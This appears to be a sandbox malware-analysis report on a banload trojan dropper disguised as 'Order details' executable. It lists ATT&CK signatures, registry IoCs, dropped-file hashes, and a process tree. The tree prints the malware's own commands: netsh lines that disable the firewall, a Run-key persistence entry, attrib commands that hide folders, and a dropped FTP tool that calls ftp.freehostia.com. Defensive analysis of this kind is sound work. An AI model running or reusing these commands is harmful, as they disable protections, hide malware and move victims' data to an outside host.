banload | 1761f7de2e6b4f406c6775556927bc7338f5b9100ebe42b4f24a528da0657e1d

Analysis

max time kernel
122s
max time network
123s
platform
windows7_x64
resource
win7-20240704-en
resource tags

arch:x64arch:x86image:win7-20240704-enlocale:en-usos:windows7-x64system
submitted
30-08-2024 13:19

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Order details 20160626122950.exe
Size

2.4MB
MD5

589fe039b5bd931e41708b69c0f76953
SHA1

b467a742647a2b703c0ca8afe9d7088f6dbf26dd
SHA256

f025f44a5c3ac7030a7be24668639025ff7b14d4db019a9b5b041ccf98eaac2e
SHA512

ce1fbaecee820f32ac60d05f0dceabcc33d743058618df1e6898eaf81558344e821812827ef3cc875e8234a3f5cf8a04d2b886c2c6407b850112f3b7abc0ef42
SSDEEP

49152:ItUMENJXfggCMoWBfzMH8fhNw9pZJf27QWqxmnMThUCWeoVoYA5+jCUq:ItsJPCMDfesNwfZJyqMGNeVPA5+jCr

Score

10^/10

banload collection credential_access discovery downloader dropper evasion persistence privilege_escalation spyware stealer trojan

Malware Config

Signatures

Banload
Banload variants download malicious files, then install and execute the files.
trojan dropper downloader banload
Credentials from Password Stores: Credentials from Web Browsers 1 TTPs
Malicious Access or copy of Web Browser Credential store.
credential_access stealer

Credentials from Web Browsers
T1555.003

Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 2 IoCs

evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	adbr01.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	adbr02.exe

Modifies Windows Firewall 2 TTPs 4 IoCs

evasion

Windows Service

T1543.003

Disable or Modify System Firewall

T1562.004

pid	Process
1568	netsh.exe
2280	netsh.exe
564	netsh.exe
2260	netsh.exe

Sets file to hidden 1 TTPs 5 IoCs

Modifies file attributes to stop it showing in Explorer etc.

evasion

Hidden Files and Directories

T1564.001

pid	Process
2920	attrib.exe
2980	attrib.exe
2988	attrib.exe
2944	attrib.exe
2224	attrib.exe

Checks BIOS information in registry 2 TTPs 4 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	adbr01.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosDate	adbr01.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	adbr02.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosDate	adbr02.exe

Executes dropped EXE 7 IoCs

pid	Process
2032	Adobeta.exe
1396	adbr01.exe
2388	adbr01.exe
2004	adbr02.exe
1736	adbr02.exe
1784	Adobeta.exe
2892	AReader.exe

Loads dropped DLL 12 IoCs

pid	Process
1752	cmd.exe
1752	cmd.exe
1752	cmd.exe
1752	cmd.exe
1396	adbr01.exe
1752	cmd.exe
1752	cmd.exe
2004	adbr02.exe
1752	cmd.exe
1752	cmd.exe
1752	cmd.exe
1752	cmd.exe

Reads local data of messenger clients 2 TTPs
Infostealers often target stored data of messaging applications, which can include saved credentials and account information.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Accesses Microsoft Outlook accounts 1 TTPs 1 IoCs

collection

Email Collection

T1114

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-3434294380-2554721341-1919518612-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts	adbr02.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-3434294380-2554721341-1919518612-1000\Software\Microsoft\Windows\CurrentVersion\Run\AdobeA = "C:\\Users\\Admin\\AppData\\Roaming\\Adobe\\Adobe Inc\\AdobeRead\\acro4.bat"	reg.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Event Triggered Execution: Netsh Helper DLL 1 TTPs 12 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

description	ioc	Process
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh	netsh.exe

System Location Discovery: System Language Discovery 1 TTPs 25 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	ipconfig.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Adobeta.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	xcopy.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	DllHost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	attrib.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	adbr02.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Adobeta.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	attrib.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	attrib.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	adbr01.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	attrib.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	adbr02.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	adbr01.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	AReader.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Order details 20160626122950.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	attrib.exe

Enumerates system info in registry 2 TTPs 1 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier	xcopy.exe

Gathers network information 2 TTPs 1 IoCs

Uses commandline utility to view network configuration.

System Information Discovery

T1082

Command and Scripting Interpreter

T1059

pid	Process
2140	ipconfig.exe

Modifies registry class 25 IoCs

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{37EDC348-F7AF-59EA-E1CC-DDFB47F24187}\LocalServer32\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\OUTLOOK.EXE\""	adbr01.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{37EDC348-F7AF-59EA-E1CC-DDFB47F24187}\ProgID	adbr01.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{37EDC348-F7AF-59EA-E1CC-DDFB47F24187}\InprocServer32	adbr01.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{37EDC348-F7AF-59EA-E1CC-DDFB47F24187}\InprocServer32\14.0.0.0\Class = "Microsoft.Office.Interop.Outlook.OlkLabelClass"	adbr01.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{37EDC348-F7AF-59EA-E1CC-DDFB47F24187}\Typelib\ = "{00062FFF-0000-0000-C000-000000000046}"	adbr01.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{37EDC348-F7AF-59EA-E1CC-DDFB47F24187}\Version\ = "9.4"	adbr01.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{37EDC348-F7AF-59EA-E1CC-DDFB47F24187}\Control	adbr01.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{37EDC348-F7AF-59EA-E1CC-DDFB47F24187}\LocalServer32	adbr01.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{37EDC348-F7AF-59EA-E1CC-DDFB47F24187}\ProgID\ = "Outlook.OlkLabel.1"	adbr01.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{37EDC348-F7AF-59EA-E1CC-DDFB47F24187}\VersionIndependentProgID	adbr01.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{37EDC348-F7AF-59EA-E1CC-DDFB47F24187}\InprocHandler32	adbr01.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{37EDC348-F7AF-59EA-E1CC-DDFB47F24187}\InprocServer32\Assembly = "Microsoft.Office.Interop.Outlook, Version=14.0.0.0, Culture=neutral, PublicKeyToken=71E9BCE111E9429C"	adbr01.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{37EDC348-F7AF-59EA-E1CC-DDFB47F24187}\InprocServer32\RuntimeVersion = "v2.0.50727"	adbr01.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{37EDC348-F7AF-59EA-E1CC-DDFB47F24187}\InprocServer32\14.0.0.0	adbr01.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{37EDC348-F7AF-59EA-E1CC-DDFB47F24187}\InprocServer32\14.0.0.0\RuntimeVersion = "v2.0.50727"	adbr01.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{37EDC348-F7AF-59EA-E1CC-DDFB47F24187}	adbr01.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{37EDC348-F7AF-59EA-E1CC-DDFB47F24187}\ = "Microsoft Outlook Label Control"	adbr01.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{37EDC348-F7AF-59EA-E1CC-DDFB47F24187}\InprocHandler32\ = "ole32.dll"	adbr01.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{37EDC348-F7AF-59EA-E1CC-DDFB47F24187}\InprocServer32\14.0.0.0\Assembly = "Microsoft.Office.Interop.Outlook, Version=14.0.0.0, Culture=neutral, PublicKeyToken=71E9BCE111E9429C"	adbr01.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{37EDC348-F7AF-59EA-E1CC-DDFB47F24187}\InprocServer32\Class = "Microsoft.Office.Interop.Outlook.OlkLabelClass"	adbr01.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{37EDC348-F7AF-59EA-E1CC-DDFB47F24187}\ToolboxBitmap32	adbr01.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{37EDC348-F7AF-59EA-E1CC-DDFB47F24187}\ToolboxBitmap32\ = "C:\\PROGRA~2\\MICROS~1\\Office14\\OUTLOOK.EXE,5502"	adbr01.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{37EDC348-F7AF-59EA-E1CC-DDFB47F24187}\VersionIndependentProgID\ = "Outlook.OlkLabel"	adbr01.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{37EDC348-F7AF-59EA-E1CC-DDFB47F24187}\Version	adbr01.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{37EDC348-F7AF-59EA-E1CC-DDFB47F24187}\Typelib	adbr01.exe

NTFS ADS 3 IoCs

description	ioc	Process
File created	C:\ProgramData\TEMP:663565B1	adbr01.exe
File opened for modification	C:\ProgramData\TEMP:663565B1	adbr01.exe
File opened for modification	C:\ProgramData\TEMP:663565B1	adbr02.exe

Suspicious use of AdjustPrivilegeToken 10 IoCs

description	pid	Process
Token: 33	2388	adbr01.exe
Token: SeIncBasePriorityPrivilege	2388	adbr01.exe
Token: 33	2388	adbr01.exe
Token: SeIncBasePriorityPrivilege	2388	adbr01.exe
Token: SeDebugPrivilege	2388	adbr01.exe
Token: 33	1736	adbr02.exe
Token: SeIncBasePriorityPrivilege	1736	adbr02.exe
Token: 33	1736	adbr02.exe
Token: SeIncBasePriorityPrivilege	1736	adbr02.exe
Token: SeDebugPrivilege	1736	adbr02.exe

Suspicious use of FindShellTrayWindow 1 IoCs

pid	Process
2624	DllHost.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2908 wrote to memory of 3004	2908	Order details 20160626122950.exe	30
PID 2908 wrote to memory of 3004	2908	Order details 20160626122950.exe	30
PID 2908 wrote to memory of 3004	2908	Order details 20160626122950.exe	30
PID 2908 wrote to memory of 3004	2908	Order details 20160626122950.exe	30
PID 2908 wrote to memory of 3004	2908	Order details 20160626122950.exe	30
PID 2908 wrote to memory of 3004	2908	Order details 20160626122950.exe	30
PID 2908 wrote to memory of 3004	2908	Order details 20160626122950.exe	30
PID 3004 wrote to memory of 2744	3004	WScript.exe	31
PID 3004 wrote to memory of 2744	3004	WScript.exe	31
PID 3004 wrote to memory of 2744	3004	WScript.exe	31
PID 3004 wrote to memory of 2744	3004	WScript.exe	31
PID 3004 wrote to memory of 2744	3004	WScript.exe	31
PID 3004 wrote to memory of 2744	3004	WScript.exe	31
PID 3004 wrote to memory of 2744	3004	WScript.exe	31
PID 2744 wrote to memory of 1620	2744	cmd.exe	34
PID 2744 wrote to memory of 1620	2744	cmd.exe	34
PID 2744 wrote to memory of 1620	2744	cmd.exe	34
PID 2744 wrote to memory of 1620	2744	cmd.exe	34
PID 2744 wrote to memory of 1620	2744	cmd.exe	34
PID 2744 wrote to memory of 1620	2744	cmd.exe	34
PID 2744 wrote to memory of 1620	2744	cmd.exe	34
PID 2744 wrote to memory of 2980	2744	cmd.exe	35
PID 2744 wrote to memory of 2980	2744	cmd.exe	35
PID 2744 wrote to memory of 2980	2744	cmd.exe	35
PID 2744 wrote to memory of 2980	2744	cmd.exe	35
PID 2744 wrote to memory of 2980	2744	cmd.exe	35
PID 2744 wrote to memory of 2980	2744	cmd.exe	35
PID 2744 wrote to memory of 2980	2744	cmd.exe	35
PID 2744 wrote to memory of 2988	2744	cmd.exe	36
PID 2744 wrote to memory of 2988	2744	cmd.exe	36
PID 2744 wrote to memory of 2988	2744	cmd.exe	36
PID 2744 wrote to memory of 2988	2744	cmd.exe	36
PID 2744 wrote to memory of 2988	2744	cmd.exe	36
PID 2744 wrote to memory of 2988	2744	cmd.exe	36
PID 2744 wrote to memory of 2988	2744	cmd.exe	36
PID 2744 wrote to memory of 2944	2744	cmd.exe	37
PID 2744 wrote to memory of 2944	2744	cmd.exe	37
PID 2744 wrote to memory of 2944	2744	cmd.exe	37
PID 2744 wrote to memory of 2944	2744	cmd.exe	37
PID 2744 wrote to memory of 2944	2744	cmd.exe	37
PID 2744 wrote to memory of 2944	2744	cmd.exe	37
PID 2744 wrote to memory of 2944	2744	cmd.exe	37
PID 2744 wrote to memory of 2224	2744	cmd.exe	38
PID 2744 wrote to memory of 2224	2744	cmd.exe	38
PID 2744 wrote to memory of 2224	2744	cmd.exe	38
PID 2744 wrote to memory of 2224	2744	cmd.exe	38
PID 2744 wrote to memory of 2224	2744	cmd.exe	38
PID 2744 wrote to memory of 2224	2744	cmd.exe	38
PID 2744 wrote to memory of 2224	2744	cmd.exe	38
PID 2744 wrote to memory of 2920	2744	cmd.exe	39
PID 2744 wrote to memory of 2920	2744	cmd.exe	39
PID 2744 wrote to memory of 2920	2744	cmd.exe	39
PID 2744 wrote to memory of 2920	2744	cmd.exe	39
PID 2744 wrote to memory of 2920	2744	cmd.exe	39
PID 2744 wrote to memory of 2920	2744	cmd.exe	39
PID 2744 wrote to memory of 2920	2744	cmd.exe	39
PID 2744 wrote to memory of 2660	2744	cmd.exe	40
PID 2744 wrote to memory of 2660	2744	cmd.exe	40
PID 2744 wrote to memory of 2660	2744	cmd.exe	40
PID 2744 wrote to memory of 2660	2744	cmd.exe	40
PID 2744 wrote to memory of 2660	2744	cmd.exe	40
PID 2744 wrote to memory of 2660	2744	cmd.exe	40
PID 2744 wrote to memory of 2660	2744	cmd.exe	40
PID 2660 wrote to memory of 1752	2660	WScript.exe	41

Views/modifies file attributes 1 TTPs 5 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
2988	attrib.exe
2944	attrib.exe
2224	attrib.exe
2920	attrib.exe
2980	attrib.exe

C:\Users\Admin\AppData\Local\Temp\Order details 20160626122950.exe
"C:\Users\Admin\AppData\Local\Temp\Order details 20160626122950.exe"
1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2908
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\AdobeR\ADBR\READER\Adobedc.vbs"
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:3004
- - C:\Windows\SysWOW64\cmd.exe
    cmd /c ""C:\Users\Admin\AppData\Roaming\AdobeR\ADBR\READER\Adob03.bat" /quiet /passive /norestart"
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:2744
  - - C:\Windows\SysWOW64\xcopy.exe
      xcopy /y /h /e /r /k /c *.* "C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\"
      4⤵
      System Location Discovery: System Language Discovery
      Enumerates system info in registry
      PID:1620
  - - C:\Windows\SysWOW64\attrib.exe
      attrib +r +a +s +h "C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead"
      4⤵
      Sets file to hidden
      System Location Discovery: System Language Discovery
      Views/modifies file attributes
      PID:2980
  - - C:\Windows\SysWOW64\attrib.exe
      attrib +r +a +s +h "C:\Users\Admin\AppData\Roaming\Adobe Reader\AdobeR"
      4⤵
      Sets file to hidden
      System Location Discovery: System Language Discovery
      Views/modifies file attributes
      PID:2988
  - - C:\Windows\SysWOW64\attrib.exe
      attrib +r +a +s +h "C:\Users\Admin\AppData\Roaming\Adobe Reader\ADBR\READER"
      4⤵
      Sets file to hidden
      System Location Discovery: System Language Discovery
      Views/modifies file attributes
      PID:2944
  - - C:\Windows\SysWOW64\attrib.exe
      attrib +r +a +s +h "C:\Users\Admin\AppData\Roaming\AdobeR\ADBR\READER"
      4⤵
      Sets file to hidden
      System Location Discovery: System Language Discovery
      Views/modifies file attributes
      PID:2224
  - - C:\Windows\SysWOW64\attrib.exe
      attrib +r +a +s +h "C:\Users\Admin\AppData\Roaming\AdobeR"
      4⤵
      Sets file to hidden
      System Location Discovery: System Language Discovery
      Views/modifies file attributes
      PID:2920
  - - C:\Windows\SysWOW64\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\Adob9.vbs"
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:2660
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\rea01.bat" /quiet /passive /norestart"
        5⤵
        Loads dropped DLL
        System Location Discovery: System Language Discovery
        
        PID:1752
      - C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\Adobeta.exe
        
        Adobeta.exe -a -c -d -natpasv -s:01.klm ftp.freehostia.com -s
        6⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:2032
      - C:\Windows\SysWOW64\reg.exe
        
        REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "AdobeA" /t REG_SZ /F /D "C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\acro4.bat"
        6⤵
        Adds Run key to start application
        System Location Discovery: System Language Discovery
        
        PID:1920
      - C:\Windows\SysWOW64\ipconfig.exe
        
        ipconfig /all
        6⤵
        System Location Discovery: System Language Discovery
        Gathers network information
        
        PID:2140
      - C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\adbr01.exe
        
        adbr01.exe -f "011.011"
        6⤵
        Executes dropped EXE
        Loads dropped DLL
        System Location Discovery: System Language Discovery
        
        PID:1396
        
        C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\adbr01.exe
        
        adbr01.exe -f "011.011"
        7⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Checks BIOS information in registry
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Modifies registry class
        NTFS ADS
        Suspicious use of AdjustPrivilegeToken
        
        PID:2388
      - C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\adbr02.exe
        
        adbr02.exe -f "112.112"
        6⤵
        Executes dropped EXE
        Loads dropped DLL
        System Location Discovery: System Language Discovery
        
        PID:2004
        
        C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\adbr02.exe
        
        adbr02.exe -f "112.112"
        7⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Checks BIOS information in registry
        Executes dropped EXE
        Accesses Microsoft Outlook accounts
        System Location Discovery: System Language Discovery
        NTFS ADS
        Suspicious use of AdjustPrivilegeToken
        
        PID:1736
      - C:\Windows\SysWOW64\netsh.exe
        
        netsh firewall set opmode disable
        6⤵
        Modifies Windows Firewall
        Event Triggered Execution: Netsh Helper DLL
        System Location Discovery: System Language Discovery
        
        PID:2260
      - C:\Windows\SysWOW64\netsh.exe
        
        netsh advfirewall set currentprofile state off
        6⤵
        Modifies Windows Firewall
        Event Triggered Execution: Netsh Helper DLL
        System Location Discovery: System Language Discovery
        
        PID:1568
      - C:\Windows\SysWOW64\netsh.exe
        
        netsh advfirewall set profiles state off
        6⤵
        Modifies Windows Firewall
        Event Triggered Execution: Netsh Helper DLL
        System Location Discovery: System Language Discovery
        
        PID:2280
      - C:\Windows\SysWOW64\netsh.exe
        
        NetSh Advfirewall set allprofiles state off
        6⤵
        Modifies Windows Firewall
        Event Triggered Execution: Netsh Helper DLL
        System Location Discovery: System Language Discovery
        
        PID:564
      - C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\Adobeta.exe
        
        Adobeta.exe -a -c -d -natpasv -s:004.afq ftp.freehostia.com
        6⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:1784
      - C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\AReader.exe
        
        AReader 5400
        6⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:2892

C:\Windows\SysWOW64\DllHost.exe
C:\Windows\SysWOW64\DllHost.exe /Processid:{76D0CB12-7604-4048-B83C-1005C7DDC503}
1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of FindShellTrayWindow
PID:2624

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Impair Defenses

T1562

Disable or Modify System Firewall

T1562.004

Modify Registry

T1112

Virtualization/Sandbox Evasion

T1497

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Virtualization/Sandbox Evasion

T1497

Lateral Movement

Collection

Data from Local System

T1005

Email Collection

T1114

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\Licenses\086A4C8982A52E70F.Lic

Filesize
140B

MD5
34313f1b6c9f24f18a7c9504d109c922

SHA1
7a7b5586b9cf1c7c9d54adcab16bceaff761fa78

SHA256
793d8c85c5cff30809c4e10738a0c8cc48f0d71842776c3955056ebd869efa7e

SHA512
3d0ec8ffa68aceda742a2220271635090e7535b87e39c1a4d32bac677b77913784713a69c83fd008c3b9840f59a49f3f42de2c2ee98cec4ff2beeb55643c8905

Download Submit
C:\ProgramData\TEMP:663565B1

Filesize
140B

MD5
975b45ee642a705c6964c62423c1265d

SHA1
36c5cfb74b08a58df3075d85fbf8f2b556bc802b

SHA256
49166da32916c50516dd2e2748d162aa81050f6f6e62ab64d6ff6aac1f18cea3

SHA512
136f500b84737dc8956b47e1975a6367e4eb4d6f0d8cb20ddb3e36420e7472ae026c20471d635976db1a23a83072b001a9e4343383d8606bbe3818373bd8da8a

Download Submit
C:\ProgramData\TEMP\RAIDTest

Filesize
4B

MD5
4ce4d01ccc41c2e73643c40abe61aa58

SHA1
2dcb3b58de4e71a1febd32f789d5fb36de11cadd

SHA256
09813ea33c87d6d2a4dec3c294c7c0a28a223b138f8fecb40450d696d8a3fced

SHA512
f54f35d5ed2a2d97a932f7713d80b754233fdc2f343cf79460f1fd3c23363fa418dcc0250ac6826df3dc5754dda0a5ad05c8705603392d2e0ecebb7b2904cbef

Download Submit
C:\Users\Admin\AppData\Roaming\AdobeR\ADBR\READER\004.afq

Filesize
118B

MD5
8e6e9290ff877feff5541cec9023f670

SHA1
64af5a9d7740c1dfc9407fcc14e1e6c5484ceffd

SHA256
503b2f2582bf2efb3d9cd446648819814037e6c7d88bb178d178048dd42dacc7

SHA512
03f85e8efc7d73f3b3eb2e6c45bf6056f4e8a2ccb1a99f83656bca1cb0b3b6a1685846b760f88e90ec9c8ce8c08571742adfd3694b9f3cc1ab002e22117c8193

Download Submit
C:\Users\Admin\AppData\Roaming\AdobeR\ADBR\READER\AReader.exe

Filesize
124KB

MD5
1a1075e5e307f3a4b8527110a51ce827

SHA1
f453838ed21020b7ca059244feea8579e5aa74ef

SHA256
ddd90e3546e95b0991df26a17cf26fa2f1c20d6a1fd4ffccf1e9b3ec3d3810d5

SHA512
b6b70c6cb3cdb05a69c75b86c1fa0fadb38de0391e1fa17daff7d12dfae2a9f483546d9bf1001ff622694fdf8a28b85cd30fc541c25be62df022d22ca17decc1

Download Submit
C:\Users\Admin\AppData\Roaming\AdobeR\ADBR\READER\Adob03.bat

Filesize
556B

MD5
97410477dc9501dffca4ea4b1ae57273

SHA1
fb573b3bf4eba734b0f32db1a5b7ff78de36b064

SHA256
3836545f759c1ff93892ea0ef81424c8acdef7dc9440e8404bc04662fe7e6f2c

SHA512
